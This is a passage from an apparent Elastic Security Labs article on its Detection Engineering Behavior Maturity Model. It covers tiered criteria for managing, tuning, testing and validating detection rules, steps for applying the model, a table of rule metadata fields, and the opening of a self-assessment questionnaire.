<li>Managed: Applies a Detections as Code (schema validation, query validation, versioning, automation, etc.) approach to rule management.</li>
<li>Optimized: Advanced automated processes with continuous weekly rule management and validation; complete documentation and version control for all rules.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No rule management activities.</li>
<li>Repeatable: Basic rule management activities are conducted quarterly; less than 20% of rules have version control.</li>
<li>Defined: Regular rule updates and documentation are conducted monthly; 50-70% of rules have version control and comprehensive documentation.</li>
<li>Managed: Automated processes for rule management and validation are conducted bi-weekly; 80-90% of rules are managed using Detections as Code principles.</li>
<li>Optimized: Advanced automated processes with continuous weekly rule management and validation; 100% of rules managed using Detections as Code principles, with complete documentation and version control.</li>
</ul>
</li>
</ul>
<h6>Improving and Maintaining Telemetry Quality</h6>
<p>Begin conversations and develop relationships with teams managing telemetry data. This applies differently to various security teams: for vendors, it may involve data from all customers; for SOC or Infosec teams, it pertains to company data; and for MSSPs, it covers data from managed clusters. Having good data sources is crucial for all security teams to ensure the effectiveness and accuracy of their detection rules. This also includes incorporating cyber threat intelligence (CTI) workflows to enrich telemetry data with relevant threat context and indicators, improving detection capabilities. Additionally, work with your vendor and align your detection engineering milestones with their feature milestones to ensure you're utilizing the best tooling and getting the most out of your detection rules. This optional criterion can be skipped if not applicable to internal security teams.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No updates or improvements to telemetry to improve the ruleset.</li>
<li>Repeatable: Occasional manual updates and minimal ad hoc collaboration.</li>
<li>Defined: Regular updates with significant integration and formalized collaboration, including communication with Points of Contact (POCs) from integration teams and initial integration of CTI data.</li>
<li>Managed: Comprehensive updates and collaboration with consistent integration of CTI data, enhancing the contextual relevance of telemetry data and improving detection accuracy.</li>
<li>Optimized: Advanced integration of CTI workflows with telemetry data, enabling real-time enrichment and automated responses to emerging threats.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No telemetry updates or improvements.</li>
<li>Repeatable: Basic manual updates and improvements occurring sporadically; less than 30% of rule types produce telemetry/internal data.</li>
<li>Defined: Regular manual updates and improvements occurring at least once per quarter, with periodic CTI data integration; 50-70% of telemetry data integrated with CTI; initial documentation of enhancements in data quality and rule effectiveness.</li>
<li>Managed: Semi-automated updates with continuous improvements, regular CTI data enrichment, and initial documentation of enhancements in data quality and rule effectiveness; 70-90% of telemetry data integrated with CTI.</li>
<li>Optimized: Fully automated updates and continuous improvements, comprehensive CTI integration, and detailed documentation of enhancements in data quality and rule effectiveness; 100% of telemetry data integrated with CTI; real-time enrichment and automated responses to emerging threats.</li>
</ul>
</li>
</ul>
<h6>Reviewing Threat Landscape Changes</h6>
<p>Regularly assess and update rules based on changes in the threat landscape, including threat modeling and organizational changes.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No reviews of threat landscape changes.</li>
<li>Repeatable: Occasional reviews with minimal updates and limited threat modeling.</li>
<li>Defined: Regular reviews and updates to ensure rule relevance and effectiveness, incorporating threat modeling.</li>
<li>Managed: Maintaining the ability to adaptively respond to emerging threats and organizational changes, with comprehensive threat modeling and cross-correlation of new intelligence.</li>
<li>Optimized: Continuous monitoring and real-time updates based on emerging threats and organizational changes, with dynamic threat modeling and cross-correlation of intelligence.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No reviews conducted.</li>
<li>Repeatable: Reviews conducted bi-annually, referencing cyber blog sites and company reports; less than 30% of rules are reviewed based on threat landscape changes.</li>
<li>Defined: Comprehensive quarterly reviews conducted, incorporating new organizational changes, documented changes and improvements in rule effectiveness; 50-70% of rules are reviewed based on threat landscape changes.</li>
<li>Managed: Continuous monitoring (monthly, weekly, or daily) of cyber intelligence sources, with actionable knowledge implemented and rules adjusted for new assets and departments; 90-100% of rules are reviewed and updated based on the latest threat intelligence and organizational changes.</li>
<li>Optimized: Real-time monitoring and updates with automated intelligence integration; 100% of rules are continuously reviewed and updated based on dynamic threat landscapes and organizational changes.</li>
</ul>
</li>
</ul>
<h6>Driving the Feature with Product Owners</h6>
<p>Actively engaging with product owners (internal or external) to ensure that the detection needs are on the product roadmap for things related to the detection rule lifecycle or product limitations impacting detection creation. This applies differently for vendors versus in-house security teams. For in-house security teams, this can apply to custom applications developed internally and engaging with vendors or third-party tooling. This implies beginning to build relationships with vendors (such as Elastic) to make feature requests that assist with their detection needs, especially when action needs to be taken by a third party rather than internally.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No engagement with product owners.</li>
<li>Repeatable: Ad hoc occasional engagement with some influence on the roadmap.</li>
<li>Defined: Regular engagement and significant influence on the product roadmap.</li>
<li>Managed: Structured engagement with product owners, leading to consistent integration of detection needs into the product roadmap.</li>
<li>Optimized: Continuous, proactive engagement with product owners, ensuring that detection needs are fully integrated into the product development lifecycle with real-time feedback and updates.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No engagements with product owners.</li>
<li>Repeatable: 1-2 engagements/requests completed per quarter; less than 20% of requests result in roadmap changes.</li>
<li>Defined: More than two engagements/requests per quarter, resulting in roadmap changes and improvements in the detection ruleset; 50-70% of requests result in roadmap changes; regular tracking and documentation of engagement outcomes.</li>
<li>Managed: Frequent engagements with product owners leading to more than 70% of requests resulting in roadmap changes; structured tracking and documentation of all engagements and outcomes.</li>
<li>Optimized: Continuous engagement with product owners with real-time tracking and adjustments; 90-100% of requests lead to roadmap changes; comprehensive documentation and proactive feedback loops.</li>
</ul>
</li>
</ul>
<h6>End-to-End Release Testing and Validation</h6>
<p>Implementing a robust end-to-end release testing and validation process to ensure the reliability and effectiveness of detection rules before pushing them to production. This includes running different tests to catch potential issues and ensure rule accuracy.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No formal testing or validation process.</li>
<li>Repeatable: Basic testing with minimal validation.</li>
<li>Defined: Comprehensive testing with internal validation processes and multiple gates.</li>
<li>Managed: Advanced testing with automated and external validation processes.</li>
<li>Optimized: Continuous, automated testing and validation with real-time feedback and improvement mechanisms.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No testing or validation activities.</li>
<li>Repeatable: 1-2 ruleset updates per release cycle (release cadence should be driven internally based on resources and internally mandated processes); less than 20% of rules tested before deployment.</li>
<li>Defined: Time to end-to-end test and release a new rule or tuning from development to production is less than one week; 50-70% of rules are tested before deployment with documented validation.</li>
<li>Managed: Ability to deploy an emerging threat rule within 24 hours; 90-100% of rules tested before deployment using automated and external validation processes; continuous improvement based on test outcomes.</li>
<li>Optimized: Real-time testing and validation with automated deployment processes; 100% of rules tested and validated continuously; proactive improvement mechanisms based on real-time feedback and intelligence.</li>
</ul>
</li>
</ul>
<h4>Tier 2: Intermediate</h4>
<p>At the intermediate tier, teams continuously tune detection rules to reduce false positives and stale rules. They identify and document gaps in ruleset coverage, testing and validating rules internally with emulation tools and malware detonations to ensure proper alerting. Systematic gap analysis and regular communication with stakeholders are emphasized.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image3.png" alt="DEBMM - Tier 2" title="DEBMM - Tier 2" /></p>
<h5>Criteria</h5>
<h6>Continuously Tuning and Reducing False Positives (FP)</h6>
<p>Regularly reviewing and adjusting rules to minimize false positives and stale rules. Establish shared/scalable exception lists when necessary to prevent repetitive adjustments and document past FP analysis to avoid recurring issues.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: Minimal tuning activities.</li>
<li>Repeatable: Reactive tuning based on alerts and ad hoc analyst feedback.</li>
<li>Defined: Proactive and systematic tuning, with documented reductions in FP rates and documented/known data sources, leveraged to reduce FPs.</li>
<li>Managed: Continuously tuned activities with detailed documentation and regular stakeholder communication; implemented systematic reviews and updates.</li>
<li>Optimized: Automated and dynamic tuning processes integrated with advanced analytics and machine learning to continuously reduce FPs and adapt to new patterns.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No reduction in FP rate (when necessary) based on the overall volume of FP alerts reduced.</li>
<li>Repeatable: 10-25% reduction in FP rate over the last quarter.</li>
<li>Defined: More than a 25% reduction in FP rate over the last quarter, with metrics varying (rate determined by ruleset feature owner) between SIEM and endpoint rules based on the threat landscape.</li>
<li>Managed: Consistent reduction in FP rate exceeding 50% over multiple quarters, with detailed metrics tracked and reported.</li>
<li>Optimized: Near real-time reduction in FP rate with automated feedback loops and continuous improvement, achieving over 75% reduction in FP rate.</li>
</ul>
</li>
</ul>
<h6>Understanding and Documenting Gaps</h6>
<p>Identifying gaps in ruleset or product coverage is essential for improving data visibility and detection capabilities. This includes documenting missing fields, logging datasets, and understanding outliers in the data. Communicating these gaps with stakeholders and addressing them as &quot;blockers&quot; helps ensure continuous improvement. By understanding outliers, teams can identify unexpected patterns or anomalies that may indicate undetected threats or issues with the current ruleset.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No gap analysis.</li>
<li>Repeatable: Occasional gap analysis with some documentation.</li>
<li>Defined: Comprehensive and regular gap analysis with detailed documentation and stakeholder communication, including identifying outliers in the data.</li>
<li>Managed: Systematic gap analysis integrated into regular workflows, with comprehensive documentation and proactive communication with stakeholders.</li>
<li>Optimized: Automated gap analysis using advanced analytics and machine learning, with real-time documentation and proactive stakeholder engagement to address gaps immediately.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No gaps documented.</li>
<li>Repeatable: 1-3 gaps in threat coverage (e.g., specific techniques like reverse shells, code injection, brute force attacks) documented and communicated.</li>
<li>Defined: More than three gaps in threat coverage or data visibility documented and communicated, including gaps that block rule creation (e.g., lack of agent/logs) and outliers identified in the data.</li>
<li>Managed: Detailed documentation and communication of all identified gaps, with regular updates and action plans to address them; over five gaps documented and communicated regularly.</li>
<li>Optimized: Continuous real-time gap analysis with automated documentation and communication; proactive measures in place to address gaps immediately; comprehensive tracking and reporting of all identified gaps.</li>
</ul>
</li>
</ul>
<h6>Testing and Validation (Internal)</h6>
<p>Performing activities like executing emulation tools, C2 frameworks, detonating malware, or other repeatable techniques to test rule functionality and ensure proper alerting.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No testing or validation.</li>
<li>Repeatable: Occasional testing with emulation capabilities.</li>
<li>Defined: Regular and comprehensive testing with malware or emulation capabilities, ensuring all rules in production are validated.</li>
<li>Managed: Systematic testing and validation processes integrated into regular workflows, with detailed documentation and continuous improvement.</li>
<li>Optimized: Automated and continuous testing and validation with advanced analytics and machine learning, ensuring real-time validation and improvement of all rules.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No internal tests were conducted.</li>
<li>Repeatable: 40% emulation coverage of production ruleset.</li>
<li>Defined: 80% automated testing coverage of production ruleset.</li>
<li>Managed: Over 90% automated testing coverage of production ruleset with continuous validation processes.</li>
<li>Optimized: 100% automated and continuous testing coverage with real-time validation and feedback loops, ensuring optimal rule performance and accuracy.</li>
</ul>
</li>
</ul>
<h4>Tier 3: Advanced</h4>
<p>Advanced maturity involves systematically identifying and addressing false negatives, validating detection rules externally, and covering advanced TTPs (Tactics, Techniques, and Procedures). This tier emphasizes comprehensive and continuous improvement through external assessments and coverage of sophisticated threats.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image9.png" alt="DEBMM - Tier 3" title="DEBMM - Tier 3" /></p>
<h5>Criteria</h5>
<h6>Triaging False Negatives (FN)</h6>
<p>Triaging False Negatives (FN) involves systematically identifying and addressing instances where the detection rules fail to trigger alerts for actual threats, referred to as false negatives. False negatives occur when a threat is present in the dataset but is not detected by the existing rules, potentially leaving the organization vulnerable to undetected attacks. Leveraging threat landscape insights, this process documents and assesses false negatives within respective environments, aiming for a threshold of true positives in the dataset using the quantitative criteria.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No triage of false negatives.</li>
<li>Repeatable: Sporadic triage with some improvements.</li>
<li>Defined: Systematic and regular triage with documented reductions in FNs and comprehensive FN assessments in different threat landscapes.</li>
<li>Managed: Proactive triage activities with detailed documentation and stakeholder communication; regular updates to address FNs.</li>
<li>Optimized: Continuous, automated triage and reduction of FNs using advanced analytics and machine learning; real-time documentation and updates.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No reduction in FN rate.</li>
<li>Repeatable: 50% of the tested samples or tools used to trigger an alert; less than 10% of rules are reviewed for FNs quarterly; minimal documentation of FN assessments.</li>
<li>Defined: 70-90% of the tested samples trigger an alert, with metrics varying based on the threat landscape and detection capabilities; 30-50% reduction in FNs over the past year; comprehensive documentation and review of FNs for at least 50% of the rules quarterly; regular feedback loops established with threat intelligence teams.</li>
<li>Managed: 90-100% of tested samples trigger an alert, with consistent FN reduction metrics tracked; over 50% reduction in FNs over multiple quarters; comprehensive documentation and feedback loops for all rules.</li>
<li>Optimized: Near real-time FN triage with automated feedback and updates; over 75% reduction in FNs; continuous documentation and proactive measures to address FNs.</li>
</ul>
</li>
</ul>
<h6>External Validation</h6>
<p>External Validation involves engaging third parties to validate detection rules through various methods, including red team exercises, third-party assessments, penetration testing, and collaboration with external threat intelligence providers. By incorporating diverse perspectives and expertise, this process ensures that the detection rules are robust, comprehensive, and effective against real-world threats.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No external validation.</li>
<li>Repeatable: Occasional external validation efforts with some improvements.</li>
<li>Defined: Regular and comprehensive external validation with documented feedback, improvements, and integration of findings into the detection ruleset. This level includes all of these validation methods.</li>
<li>Managed: Structured external validation activities with detailed documentation and continuous improvement; proactive engagement with multiple third-party validators.</li>
<li>Optimized: Continuous external validation with automated feedback integration, real-time updates, and proactive improvements based on diverse third-party insights.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No external validation was conducted.</li>
<li>Repeatable: 1 external validation exercise per year, such as a red team exercise or third-party assessment; less than 20% of identified gaps are addressed annually.</li>
<li>Defined: More than one external validation exercise per year, including a mix of methods such as red team exercises, third-party assessments, penetration testing, and collaboration with external threat intelligence providers; detailed documentation of improvements based on external feedback, with at least 80% of identified gaps addressed within a quarter; integration of external validation findings into at least 50% of new rules.</li>
<li>Managed: Multiple external validation exercises per year, with comprehensive feedback integration; over 90% of identified gaps addressed within set timelines; proactive updates to rules based on continuous external insights.</li>
<li>Optimized: Continuous, real-time external validation with automated feedback and updates; 100% of identified gaps addressed proactively; comprehensive tracking and reporting of all external validation outcomes.</li>
</ul>
</li>
</ul>
<h6>Advanced TTP Coverage</h6>
<p>Covering non-commodity malware (APTs, zero-days, etc.) and emerging threats (new malware families and offensive security tools abused by threat actors, etc.) in the ruleset. This coverage is influenced by the capability of detecting these advanced threats, which requires comprehensive telemetry and flexible data ingestion. While demonstrating these behaviors early in the maturity process can have a compounding positive effect on team growth, this criterion is designed to focus on higher fidelity rulesets with low FPs.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No advanced TTP coverage.</li>
<li>Repeatable: Response to some advanced TTPs based on third-party published research.</li>
<li>Defined: First-party coverage created for advanced TTPs based on threat intelligence and internal research, with flexible and comprehensive data ingestion capabilities.</li>
<li>Managed: Proactive coverage for advanced TTPs with detailed threat intelligence and continuous updates; integration with diverse data sources for comprehensive detection.</li>
<li>Optimized: Continuous, automated coverage for advanced TTPs using advanced analytics and machine learning; real-time updates and proactive measures for emerging threats.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No advanced TTP coverage.</li>
<li>Repeatable: Detection and response to 1-3 advanced TTPs/adversaries based on available data and third-party research; less than 20% of rules cover advanced TTPs.</li>
<li>Defined: Detection and response to more than three advanced TTPs/adversaries uniquely identified and targeted based on first-party threat intelligence and internal research; 50-70% of rules cover advanced TTPs; comprehensive telemetry and flexible data ingestion for at least 70% of advanced threat detections; regular updates to advanced TTP coverage based on new threat intelligence.</li>
<li>Managed: Detection and response to over five advanced TTPs/adversaries with continuous updates and proactive measures; 70-90% of rules cover advanced TTPs with integrated telemetry and data ingestion; regular updates and feedback loops with threat intelligence teams.</li>
<li>Optimized: Real-time detection and response to advanced TTPs with automated updates and proactive coverage; 100% of rules cover advanced TTPs with continuous telemetry integration; dynamic updates and real-time feedback based on evolving threat landscapes.</li>
</ul>
</li>
</ul>
<h4>Tier 4: Expert</h4>
<p>The expert tier focuses on advanced automation, seamless integration with other security tools, and continuous improvement through regular updates and external collaboration. While proactive threat hunting is essential for maintaining a solid security posture, it complements the ruleset management process by identifying new patterns and insights that can be incorporated into detection rules. Teams implement sophisticated automation for rule updates, ensuring continuous integration of advanced detections. At Elastic, our team is constantly refining our rulesets through daily triage, regular updates, and sharing <a href="https://github.com/elastic/detection-rules/tree/main/hunting">threat hunt queries</a> in our public GitHub repository to help the community improve their detection capabilities.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image1.png" alt="DEBMM - Tier 4" title="DEBMM - Tier 4" /></p>
<h5>Criteria</h5>
<h6>Hunting in Telemetry/Internal Data</h6>
<p>Setting up queries and daily triage to hunt for new threats and ensure rule effectiveness. This applies to vendors hunting in telemetry and other teams hunting in their available datasets.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No hunting activities leading to ruleset improvement.</li>
<li>Repeatable: Occasional hunting activities with some findings.</li>
<li>Defined: Regular and systematic hunting with significant coverage findings based on the Threat Hunting Maturity Model, including findings from external validation, end-to-end testing, and malware detonations.</li>
<li>Managed: Continuous hunting activities with comprehensive documentation and integration of findings; regular feedback loops between hunting and detection engineering teams.</li>
<li>Optimized: Automated, real-time hunting with advanced analytics and machine learning; continuous documentation and proactive integration of findings to enhance detection rules.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No hunting activities conducted, leading to ruleset improvement.</li>
<li>Repeatable: Bi-weekly outcome (e.g., discovered threats, new detections based on hypotheses, etc.) from hunting workflows; less than 20% of hunting findings are documented; minimal integration of hunting results into detection rules.</li>
<li>Defined: Weekly outcome with documented improvements and integration into detection rules based on hunting results and external validation data; 50-70% of hunting findings are documented and integrated into detection rules; regular feedback loop established between hunting and detection engineering teams.</li>
<li>Managed: Daily hunting activities with comprehensive documentation and integration of findings; over 90% of hunting findings are documented and lead to updates in detection rules; continuous improvement processes based on hunting results and external validation data; regular collaboration with threat intelligence teams to enhance hunting effectiveness.</li>
<li>Optimized: Real-time hunting activities with automated documentation and integration; 100% of hunting findings are documented and lead to immediate updates in detection rules; continuous improvement with proactive measures based on advanced analytics and threat intelligence.</li>
</ul>
</li>
</ul>
<h6>Continuous Improvement and Potential Enhancements</h6>
<p>Continuous improvement is vital at the expert tier, leveraging the latest technologies and methodologies to enhance detection capabilities. The &quot;Optimized&quot; levels in the different criteria across various tiers emphasize the necessity for advanced automation and the integration of emerging technologies. Implementing automation for rule updates, telemetry filtering, and integration with other advanced tools is essential for modern detection engineering. While current practices involve advanced automation beyond basic case management and SOAR (Security Orchestration, Automation, and Response), there is potential for further enhancements using emerging technologies like generative AI and large language models (LLMs). This reinforces the need for continuous adaptation and innovation at the highest tier to maintain a robust and effective security posture.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No automation.</li>
<li>Repeatable: Basic automation for rule management processes, such as ETL (Extract, transform, and load) data plumbing to enable actionable insights.</li>
<li>Defined: Initial use of generative AI to assist in rule creation and assessment. For example, AI can assess the quality of rules based on predefined criteria.</li>
<li>Managed: Advanced use of AI/LLMs to detect rule duplications and overlaps, suggesting enhancements rather than creating redundant rules.</li>
<li>Optimized: Full generative AI/LLMs integration throughout the detection engineering lifecycle. This includes using AI to continuously improve rule accuracy, reduce false positives, and provide insights on rule effectiveness.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No automated processes implemented.</li>
<li>Repeatable: Implement basic automated processes for rule management and integration; less than 30% of rule management tasks are automated; initial setup of automated deployment and version control.</li>
<li>Defined: Use of AI to assess rule quality, with at least 80% of new rules undergoing automated quality checks before deployment; 40-60% of rule management tasks are automated; initial AI-driven insights are used to enhance rule effectiveness and reduce false positives.</li>
<li>Managed: AI-driven duplication detection, with a target of reducing rule duplication by 50% within the first year of implementation; 70-80% of rule management tasks are automated; AI-driven suggestions result in a 30-50% reduction in FPs; continuous integration pipeline capturing and deploying rule updates.</li>
<li>Optimized: Comprehensive AI integration, where over 90% of rule updates and optimizations are suggested by AI, leading to a significant decrease in manual triaging of alerts and a 40% reduction in FPs; fully automated rule management and deployment processes; real-time AI-driven telemetry filtering and integration with other advanced tools.</li>
</ul>
</li>
</ul>
<h3>Applying the DEBMM to Understand Maturity</h3>
<p>Once you understand the DEBMM and its tiers, you can begin applying it to assess and enhance your detection engineering maturity.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image4.png" alt="Maturity Progression" title="Maturity Progression" /></p>
<p>The following steps will guide you through the process:</p>
<p><strong>1. Audit Your Current Maturity Tier:</strong> Evaluate your existing detection rulesets against the criteria outlined in the DEBMM. Identify your rulesets' strengths, weaknesses, and most significant risks to help determine your current maturity tier. For more details, see the <a href="#Example-Questionnaire">Example Questionnaire</a>.</p>
<p><strong>2. Understand the Scope of Effort:</strong> Recognize the significant and sustained effort required to move from one tier to the next. As teams progress through the tiers, the complexity and depth of activities increase, requiring more resources, advanced skills, and comprehensive strategies. For example, transitioning from Tier 1 to Tier 2 involves systematic rule tuning and detailed gap analysis, while advancing to Tier 3 and Tier 4 requires robust external validation processes, proactive threat hunting, and sophisticated automation.</p>
<p><strong>3. Set Goals for Progression:</strong> Define specific goals for advancing to the next tier. Use the qualitative and quantitative measures to set clear objectives for each criterion.</p>
<p><strong>4. Develop a Roadmap:</strong> Create a detailed plan outlining the actions needed to achieve the goals. Include timelines, resources, and responsible team members. Ensure foundational practices from lower tiers are consistently applied as you progress while identifying opportunities for quick wins or significant impact by first addressing the most critical and riskiest areas for improvement.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image7.png" alt="" /></p>
<p><strong>5. Implement Changes:</strong> Execute the plan, ensuring all team members are aligned with the objectives and understand their roles. Review and adjust the plan regularly as needed.</p>
<p><strong>6. Monitor and Measure Progress:</strong> Continuously track and measure the performance of your detection rulesets against the DEBMM criteria. Use metrics and key performance indicators (KPIs) to monitor your progress and identify areas for further improvement.</p>
<p><strong>7. Iterate and Improve:</strong> Regularly review and update your improvement plan based on feedback, results, and changing threat landscapes. Iterate on your detection rulesets to enhance their effectiveness and maintain a high maturity tier.</p>
<h4>Grouping Criteria for Targeted Improvement</h4>
<p>To further simplify the process, you can group criteria into specific categories to focus on targeted improvements. For example:</p>
<ul>
<li><strong>Rule Creation and Management:</strong> Includes criteria for creating, managing, and maintaining rules.</li>
<li><strong>Telemetry and Data Quality:</strong> Focuses on improving and maintaining telemetry quality.</li>
<li><strong>Threat Landscape Review:</strong> Involves regularly reviewing and updating rules based on changes in the threat landscape.</li>
<li><strong>Stakeholder Engagement:</strong> Engaging with product owners and other stakeholders to meet detection needs.</li>
</ul>
<p>Grouping criteria allow you to prioritize activities and improvements based on your current needs and goals. This structured and focused approach helps enhance your detection rulesets and is especially beneficial for teams with multiple feature owners working in different domains toward a common goal.</p>
<h2>Conclusion</h2>
<p>Whether you apply the DEBMM to your ruleset or use it as a guide to enhance your detection capabilities, the goal is to help you systematically develop, manage, and improve your detection rulesets. By following this structured model and progressing through the maturity tiers, you can significantly enhance the effectiveness of your threat detection capabilities. Remember, security is a continuous journey; consistent improvement is essential to stay ahead of emerging threats and maintain a robust security posture. The DEBMM will support you in achieving better security and more effective threat detection. We value your feedback and suggestions on refining and enhancing the model to benefit the security community. Please feel free to reach out with your thoughts and ideas.</p>
<p>We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via <a href="https://github.com/elastic/protections-artifacts/issues">GitHub issues</a>, chat with us in our <a href="http://ela.st/slack">community Slack</a>, and ask questions in our <a href="https://discuss.elastic.co/c/security/endpoint-security/80">Discuss forums</a>!</p>
<h2>Appendix</h2>
<h3>Example Rule Metadata</h3>
<p>Below is an updated list of criteria that align with example metadata used within Elastic but should be tailored to the product used:</p>
<table>
<thead>
<tr>
<th align="center">Field</th>
<th align="center">Criteria</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center">name</td>
<td align="center">Should be descriptive, concise, and free of typos related to the rule. Clearly state the action or behavior being detected. Validation can include spell-checking and ensuring it adheres to naming conventions.</td>
</tr>
<tr>
<td align="center">author</td>
<td align="center">Should attribute the author or organization who developed the rule.</td>
</tr>
<tr>
<td align="center">description</td>
<td align="center">Detailed explanation of what the rule detects, including the context and significance. Should be free of jargon and easily understandable. Validation can ensure the length and readability of the text.</td>
</tr>
<tr>
<td align="center">from</td>
<td align="center">Defines the time range the rule should look back from the current time. Should be appropriate for the type of detection and the expected data retention period. Validation can check if the time range is within acceptable limits.</td>
</tr>
<tr>
<td align="center">index</td>
<td align="center">Specifies the data indices to be queried. Should accurately reflect where relevant data is stored. Validation can ensure indices exist and are correctly formatted.</td>
</tr>
<tr>
<td align="center">language</td>
<td align="center">Indicates the query language used (e.g., EQL, KQL, Lucene). Should be appropriate for the type of query and the data source if multiple languages are available. Validation can confirm the language is supported and matches the query format.</td>
</tr>
<tr>
<td align="center">license</td>
<td align="center">Indicates the license under which the rule is provided. Should be clear and comply with legal requirements. Validation can check against a list of approved licenses.</td>
</tr>
<tr>
<td align="center">rule_id</td>
<td align="center">Unique identifier for the rule. Should be a UUID to ensure uniqueness. Validation can ensure the rule_id follows UUID format.</td>
</tr>
<tr>
<td align="center">risk_score</td>
<td align="center">Numerical value representing the severity or impact of the detected behavior. Should be based on a standardized scoring system. Validation can check the score against a defined range.</td>
</tr>
<tr>
<td align="center">severity</td>
<td align="center">Descriptive level of the rule's severity (e.g., low, medium, high). Should align with the risk score and organizational severity definitions. Validation can ensure consistency between risk score and severity.</td>
</tr>
<tr>
<td align="center">tags</td>
<td align="center">List of tags categorizing the rule. Should include relevant domains, operating systems, use cases, tactics, and data sources. Validation can check for the presence of required tags and their format.</td>
</tr>
<tr>
<td align="center">type</td>
<td align="center">Specifies the type of rule (e.g., eql, query). Should match the query language and detection method. Validation can ensure the type is correctly specified.</td>
</tr>
<tr>
<td align="center">query</td>
<td align="center">The query logic used to detect the behavior. Should be efficient, accurate, and tested for performance with fields validated against a schema. Validation can include syntax checking and performance testing.</td>
</tr>
<tr>
<td align="center">references</td>
<td align="center">List of URLs or documents that provide additional context or background information. Should be relevant and authoritative. Validation can ensure URLs are accessible and from trusted sources.</td>
</tr>
<tr>
<td align="center">setup</td>
<td align="center">Instructions for setting up the rule. Should be clear, comprehensive, and easy to follow. Validation can check for completeness and clarity.</td>
</tr>
<tr>
<td align="center">creation_date</td>
<td align="center">Date when the rule was created. Should be in a standardized format. Validation can ensure the date is in the correct format.</td>
</tr>
<tr>
<td align="center">updated_date</td>
<td align="center">Date when the rule was last updated. Should be in a standardized format. Validation can ensure the date is in the correct format.</td>
</tr>
<tr>
<td align="center">integration</td>
<td align="center">List of integrations that the rule supports. Should be accurate and reflect all relevant integrations. Validation can ensure integrations are correctly listed.</td>
</tr>
<tr>
<td align="center">maturity</td>
<td align="center">Indicates the maturity level of the rule (e.g., experimental, beta, production). Should reflect the stability and reliability of the rule. Validation can check against a list of accepted maturity levels. Note: While this field is not explicitly used in Kibana, it’s beneficial to track rules with different maturities in the format stored locally in VCS.</td>
</tr>
<tr>
<td align="center">threat</td>
<td align="center">List of MITRE ATT&amp;CK tactics, techniques, and subtechniques related to the rule. Should be accurate and provide relevant context. Validation can check for correct mapping to MITRE ATT&amp;CK.</td>
</tr>
<tr>
<td align="center">actions</td>
<td align="center">List of actions to be taken when the rule is triggered. Should be clear and actionable. Validation can ensure actions are feasible and clearly defined.</td>
</tr>
<tr>
<td align="center">building_block_type</td>
<td align="center">Type of building block rule if applicable. Should be specified if the rule is meant to be a component of other rules. Validation can ensure this field is used appropriately.</td>
</tr>
<tr>
<td align="center">enabled</td>
<td align="center">Whether the rule is currently enabled or disabled. Validation can ensure this field is correctly set.</td>
</tr>
<tr>
<td align="center">exceptions_list</td>
<td align="center">List of exceptions to the rule. Should be comprehensive and relevant. Validation can check for completeness and relevance.</td>
</tr>
<tr>
<td align="center">version</td>
<td align="center">Indicates the version of the rule (int, semantic version, etc) to track changes. Validation can ensure the version follows a consistent format.</td>
</tr>
</tbody>
</table>
<h3>Example Questionnaire</h3>
<h4>1. Identify Threat Landscape</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Do you regularly review the top 5 threats your organization faces? (Yes/No)</li>
<li>Are relevant tactics and techniques identified for these threats? (Yes/No)</li>
<li>Is the threat landscape reviewed and updated regularly? (Yes - Monthly/Yes - Quarterly/Yes - Annually/No)</li>
<li>Have any emerging threats been recently identified? (Yes/No)</li>
<li>Is there a designated person responsible for monitoring the threat landscape? (Yes/No)</li>
<li>Do you have data sources that capture relevant threat traffic? (Yes/Partial/No)</li>
<li>Are critical assets likely to be affected by these threats identified? (Yes/No)</li>
<li>Are important assets and their locations documented? (Yes/No)</li>
<li>Are endpoints, APIs, IAM, network traffic, etc. in these locations identified? (Yes/Partial/No)</li>
<li>Are critical business operations identified and their maintenance ensured? (Yes/No)</li>
<li>If in healthcare, are records stored in a HIPAA-compliant manner? (Yes/No)</li>
